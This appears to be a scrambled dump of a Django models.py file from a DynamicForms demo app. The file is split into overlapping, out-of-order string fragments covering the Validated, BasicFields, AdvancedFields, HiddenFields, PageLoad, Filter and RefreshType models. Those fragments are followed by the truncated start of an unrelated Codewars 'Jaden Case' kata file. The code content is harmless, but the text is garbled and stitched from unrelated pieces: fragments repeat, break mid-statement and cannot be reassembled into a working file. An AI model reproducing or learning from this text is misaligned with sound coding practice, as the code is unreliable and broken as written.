"= models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property",
"= models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting with two characters, followed",
"Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' )",
"two characters, followed by up to 8 numbers') ]) enabled = models.BooleanField() amount",
"is always read_only is defined only in serializer # and primary_key_related_field is defined",
"free to use a decimal point / comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True,",
"return self.name class AdvancedFields(models.Model): \"\"\" Shows advanced available fields in DynamicForms \"\"\" regex_field",
"= models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice",
"attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field > timezone.now()",
"blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute for ReadOnlyField hidden_field =",
"\"\"\" Model related to AdvancedFields model \"\"\" name = models.CharField(max_length=16) def __str__(self): return",
"HTML forms in DRF\"\"\" # list_field = models.? # dict_field = models.? \"\"\"JSONField",
"field so you will need to override it in form ('A', 'A'), ('B',",
"field visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter abc to hide unit field') unit",
"comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically changing field visibility \"\"\"",
"changing field visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter abc to hide unit field')",
"# string_related_field, which is always read_only is defined only in serializer # and",
"1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2,",
"in HTML forms in DRF\"\"\" # list_field = models.? # dict_field = models.?",
"in serializer # and primary_key_related_field is defined as its source primary_key_related_field = models.OneToOneField(",
"'Custom'), ), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True,",
"options A-C may be chosen', 'regex') ]) comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model):",
"field', verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows basic available fields in",
"ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True)",
"related_name='primary' ) slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField(",
"will need to override it in form ('A', 'A'), ('B', 'B'), ('C', 'C'),",
"> timezone.now() - timedelta(days=1) \"\"\"ListField and DictField not supported in HTML forms in",
"unit field') unit = models.CharField(max_length=10, choices=( (None, 'No additional data'), ('pcs', 'Pieces'), ('wt',",
"code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting with two characters,",
"Shows basic available fields in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field =",
"models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2)",
"= models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field =",
"= models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field =",
"slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related'",
"2'), (2, 'Choice 3'), (3, 'Choice 4'),), help_text='Integer field with choices', verbose_name='Integer field",
"blank=True, validators=[ # This one should be interesting: will a blank value pass",
"# json_field = models.JSONField() # serializer_method_field = models.? # model_field = models.? #",
"= models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field = models.TimeField(null=True)",
"available fields in DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field",
"verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model):",
"something') class PageLoad(models.Model): \"\"\" Shows how DynamicForms handles dynamic loading of many records",
"null=True, blank=True, help_text='Enter additional info here') additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now that",
"you will need to override it in form ('A', 'A'), ('B', 'B'), ('C',",
"with two characters, followed by up to 8 numbers') ]) enabled = models.BooleanField()",
"Min validator? It should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask. 1=apartment_number, ..., 32=delay",
"1'), (2, 'Choice 2'), (3, 'Choice 3')), null=False, blank=False, default=1) class Filter(models.Model): \"\"\"",
"fields in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field =",
"(3, 'Choice 4'),), help_text='Integer field with choices', verbose_name='Integer field with choices') bool_field =",
"models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True)",
"validation capabilities \"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting",
"filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True)",
"(2, 'Choice 2'), (3, 'Choice 3')), null=False, blank=False, default=1) class Filter(models.Model): \"\"\" Shows",
"verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows basic available fields in DynamicForms",
"# Bit mask. 1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=( (0, 'Choice 1'), (1,",
"'Choice 2'), (3, 'Choice 3')), null=False, blank=False, default=1) class Filter(models.Model): \"\"\" Shows how",
"null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to use a decimal",
"use a decimal point / comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter",
"\"\"\" Shows advanced available fields in DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field =",
"on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self): return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\"",
"chosen', 'regex') ]) comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically changing",
"= models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self): return 'Advanced field {self.id}'.format(**locals())",
"help_text='Now that you have shown me, please enter something') class PageLoad(models.Model): \"\"\" Shows",
"'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may be chosen', 'regex') ]) comment",
"for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field > timezone.now() -",
"supported in HTML forms in DRF\"\"\" # list_field = models.? # dict_field =",
"django.db import models from django.utils import timezone class Validated(models.Model): \"\"\" Shows validation capabilities",
"pass the Min validator? It should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask. 1=apartment_number,",
"primary_key_related_field is defined as its source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary'",
"AdvancedFields model \"\"\" name = models.CharField(max_length=16) def __str__(self): return self.name class AdvancedFields(models.Model): \"\"\"",
"hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self): return 'Advanced field",
"blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to use a decimal point",
"datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field",
"models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows basic available",
"models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'),),",
"models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def",
"models.CharField(max_length=4, blank=True, choices=( # this one will be a multi-choice field so you",
"DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32)",
"readonly_field(self): return self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField and DictField not supported in",
"description') choice = models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'), (3, 'Choice 3')), null=False,",
"a multi-choice field so you will need to override it in form ('A',",
"item_type = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3,",
"# serializer_method_field = models.? # model_field = models.? # Relations # string_related_field, which",
"models.? \"\"\"JSONField available only for PostgreSQL\"\"\" # json_field = models.JSONField() # serializer_method_field =",
") def __str__(self): return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how DynamicForms",
"'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may be chosen', 'regex')",
"help_text='Fell free to use a decimal point / comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment',",
"multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two",
"models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True)",
"1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'), )) item_flags =",
"will be a multi-choice field so you will need to override it in",
"models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field",
"RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting with two characters, followed by up to",
"'Choice 4'),), help_text='Integer field with choices', verbose_name='Integer field with choices') bool_field = models.BooleanField(help_text='Boolean",
"max_length=8) filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True,",
"= models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two =",
"= models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/',",
") hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self): return 'Advanced",
"(3, 'Choice 4'), )) item_flags = models.CharField(max_length=4, blank=True, choices=( # this one will",
"not supported in HTML forms in DRF\"\"\" # list_field = models.? # dict_field",
"\"\"\"ListField and DictField not supported in HTML forms in DRF\"\"\" # list_field =",
"override it in form ('A', 'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'), ),",
"and primary_key_related_field is defined as its source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True,",
"blank=True) float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field",
"qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to use a decimal point /",
"blank=True, help_text='Fell free to use a decimal point / comma') cst_fld = models.CharField(max_length=80,",
"blank value pass the Min validator? It should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit",
"\"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting with two",
"null=False, blank=False, default=1) class Filter(models.Model): \"\"\" Shows how DynamicForms handles filers \"\"\" char_field",
"= models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field",
"boolean_field = models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field =",
"DictField not supported in HTML forms in DRF\"\"\" # list_field = models.? #",
"models.? # Relations # string_related_field, which is always read_only is defined only in",
"of many records in ViewSet result \"\"\" description = models.CharField(max_length=20, help_text='Item description') choice",
"max_length=32) class Relation(models.Model): \"\"\" Model related to AdvancedFields model \"\"\" name = models.CharField(max_length=16)",
"# model_field = models.? # Relations # string_related_field, which is always read_only is",
"advanced available fields in DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8)",
"dynamically changing field visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter abc to hide unit",
"capabilities \"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting with",
"'Choice 3'), (3, 'Choice 4'),), help_text='Integer field with choices', verbose_name='Integer field with choices')",
"additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ), null=True, blank=True) int_fld =",
"3'), (3, 'Choice 4'), )) item_flags = models.CharField(max_length=4, blank=True, choices=( # this one",
"dict_field = models.? \"\"\"JSONField available only for PostgreSQL\"\"\" # json_field = models.JSONField() #",
"with choices', verbose_name='Integer field with choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name",
"= models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'), (3,",
"hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity'",
"Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field =",
"blank=True) # Model attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self): return",
"blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True) # Model",
"for PostgreSQL\"\"\" # json_field = models.JSONField() # serializer_method_field = models.? # model_field =",
"json_field = models.JSONField() # serializer_method_field = models.? # model_field = models.? # Relations",
"is defined as its source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' )",
"models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField and DictField",
"'Weight'), ('cst', 'Custom'), ), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld =",
"datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field",
"= models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field =",
"choices=( # this one will be a multi-choice field so you will need",
"\"\"\" note = models.CharField(max_length=20, help_text='Enter abc to hide unit field') unit = models.CharField(max_length=10,",
"# This one should be interesting: will a blank value pass the Min",
"models from django.utils import timezone class Validated(models.Model): \"\"\" Shows validation capabilities \"\"\" code",
"32=delay item_type = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'),",
"hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField",
"timedelta(days=1) \"\"\"ListField and DictField not supported in HTML forms in DRF\"\"\" # list_field",
"\"\"\" regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field",
") hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True,",
"decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field =",
"BasicFields(models.Model): \"\"\" Shows basic available fields in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False)",
"class Validated(models.Model): \"\"\" Shows validation capabilities \"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please",
"Bit mask. 1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice",
"int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'), (1,",
"'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'),), help_text='Integer field with choices', verbose_name='Integer",
"class BasicFields(models.Model): \"\"\" Shows basic available fields in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False,",
"available only for PostgreSQL\"\"\" # json_field = models.JSONField() # serializer_method_field = models.? #",
"defined as its source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field",
"]) comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically changing field visibility",
"starting with two characters, followed by up to 8 numbers') ]) enabled =",
"integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True,",
"= models.? # dict_field = models.? \"\"\"JSONField available only for PostgreSQL\"\"\" # json_field",
"'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'), )) item_flags = models.CharField(max_length=4, blank=True,",
"django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from django.db import models from django.utils import timezone",
"models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to use a",
"me, please enter something') class PageLoad(models.Model): \"\"\" Shows how DynamicForms handles dynamic loading",
"Shows how DynamicForms handles dynamic loading of many records in ViewSet result \"\"\"",
"Shows how DynamicForms handles filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char field')",
"models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'), (3, 'Choice",
"('B', 'B'), ('C', 'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may",
"Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self): return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model):",
"from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from django.db import models from django.utils import",
"(3, 'Choice 3')), null=False, blank=False, default=1) class Filter(models.Model): \"\"\" Shows how DynamicForms handles",
"ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field > timezone.now() - timedelta(days=1)",
"self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField and DictField not supported in HTML forms",
"= models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to use",
"single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field =",
"\"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field",
"primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE,",
"comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional info here') additional_text =",
"timezone.now() - timedelta(days=1) \"\"\"ListField and DictField not supported in HTML forms in DRF\"\"\"",
"list_field = models.? # dict_field = models.? \"\"\"JSONField available only for PostgreSQL\"\"\" #",
"validator? It should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask. 1=apartment_number, ..., 32=delay item_type",
"additional info here') additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now that you have shown",
"handles filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime",
"2'), (2, 'Choice 3'), (3, 'Choice 4'), )) item_flags = models.CharField(max_length=4, blank=True, choices=(",
"choice = models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'), (3, 'Choice 3')), null=False, blank=False,",
"'No additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ), null=True, blank=True) int_fld",
"max_length=32) email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True)",
"]) enabled = models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[ # This one should",
"verbose_name='Integer field with choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name = models.CharField(max_length=20,",
"return self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField and DictField not supported in HTML",
"models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field",
"a string starting with two characters, followed by up to 8 numbers') ])",
"), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may be chosen', 'regex') ]) comment =",
"handles different refresh types \"\"\" description = models.CharField(max_length=20, help_text='Item description') rich_text_field = models.TextField(blank=True,",
"basic available fields in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True)",
"help_text='Name field', verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows basic available fields",
"('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True,",
"value pass the Min validator? It should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask.",
"nullint_field = models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field",
"int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to",
"= models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField and",
"Validated(models.Model): \"\"\" Shows validation capabilities \"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter",
"read_only is defined only in serializer # and primary_key_related_field is defined as its",
"self.name class AdvancedFields(models.Model): \"\"\" Shows advanced available fields in DynamicForms \"\"\" regex_field =",
"/ comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional info here') additional_text",
"models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True)",
"one will be a multi-choice field so you will need to override it",
"models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True, blank=True)",
"result \"\"\" description = models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice 1'), (2,",
"RefreshType(models.Model): \"\"\" Shows how DynamicForms handles different refresh types \"\"\" description = models.CharField(max_length=20,",
"= models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field",
"{self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how DynamicForms handles different refresh types \"\"\" description",
"'Choice 1'), (2, 'Choice 2'), (3, 'Choice 3')), null=False, blank=False, default=1) class Filter(models.Model):",
"slug_field = models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field",
"in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True,",
"on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey(",
"visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter abc to hide unit field') unit =",
"'Choice 4'), )) item_flags = models.CharField(max_length=4, blank=True, choices=( # this one will be",
"null=True, blank=True, help_text='Fell free to use a decimal point / comma') cst_fld =",
"validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting with two characters, followed by up",
"available fields in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field",
"def __str__(self): return self.name class AdvancedFields(models.Model): \"\"\" Shows advanced available fields in DynamicForms",
"RegexValidator(r'^[ABC]*$', 'Only options A-C may be chosen', 'regex') ]) comment = models.TextField(null=True, blank=True)",
"amount = models.IntegerField(null=True, blank=True, validators=[ # This one should be interesting: will a",
"models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug'",
"<gh_stars>10-100 from datetime import timedelta from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from django.db",
"DynamicForms handles dynamic loading of many records in ViewSet result \"\"\" description =",
"duration_field = models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model related to",
"description = models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'),",
"field') name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model): \"\"\"",
"= models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field =",
"import MaxValueValidator, MinValueValidator, RegexValidator from django.db import models from django.utils import timezone class",
"models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'),",
"help_text='Char field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer",
"models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field =",
"choices', verbose_name='Integer field with choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name =",
"# Relations # string_related_field, which is always read_only is defined only in serializer",
"# this one will be a multi-choice field so you will need to",
"to override it in form ('A', 'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'),",
"string_related_field, which is always read_only is defined only in serializer # and primary_key_related_field",
"with choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name field',",
"name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows",
"cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional info here') additional_text = models.CharField(max_length=80,",
"here') additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now that you have shown me, please",
"\"\"\" Shows dynamically changing field visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter abc to",
"def readonly_field(self): return self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField and DictField not supported",
"enter something') class PageLoad(models.Model): \"\"\" Shows how DynamicForms handles dynamic loading of many",
"a blank value pass the Min validator? It should! MinValueValidator(5), MaxValueValidator(10) ]) #",
"item_flags = models.CharField(max_length=4, blank=True, choices=( # this one will be a multi-choice field",
"'Choice 3')), null=False, blank=False, default=1) class Filter(models.Model): \"\"\" Shows how DynamicForms handles filers",
"]) # Bit mask. 1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=( (0, 'Choice 1'),",
"how DynamicForms handles filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field",
"field', null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows basic available fields in DynamicForms \"\"\"",
"..., 32=delay item_type = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice",
"= models.CharField(max_length=4, blank=True, choices=( # this one will be a multi-choice field so",
"form ('A', 'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only",
"timedelta from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from django.db import models from django.utils",
"decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True)"
] |
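Worth a quick illustration: the validator stacks on Validated above only fire when the model is cleaned. A minimal sketch, assuming a configured Django project with this models module importable (nothing here is DynamicForms API; values are made up):

from django.core.exceptions import ValidationError

record = Validated(code='zz12345', enabled=True, amount=3,
                   item_type=0, item_flags='AD', comment=None)
try:
    record.full_clean()  # runs the field validators declared on the model
except ValidationError as e:
    # amount=3 fails MinValueValidator(5); item_flags='AD' fails the ^[ABC]*$ regex
    print(e.message_dict)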
<gh_stars>0
"""
https://www.codewars.com/kata/5390bac347d09b7da40006f6
Given a string, return a string in which each word is capitalized

Example:
Not Jaden-Cased: "How can mirrors be real if our eyes aren't real"
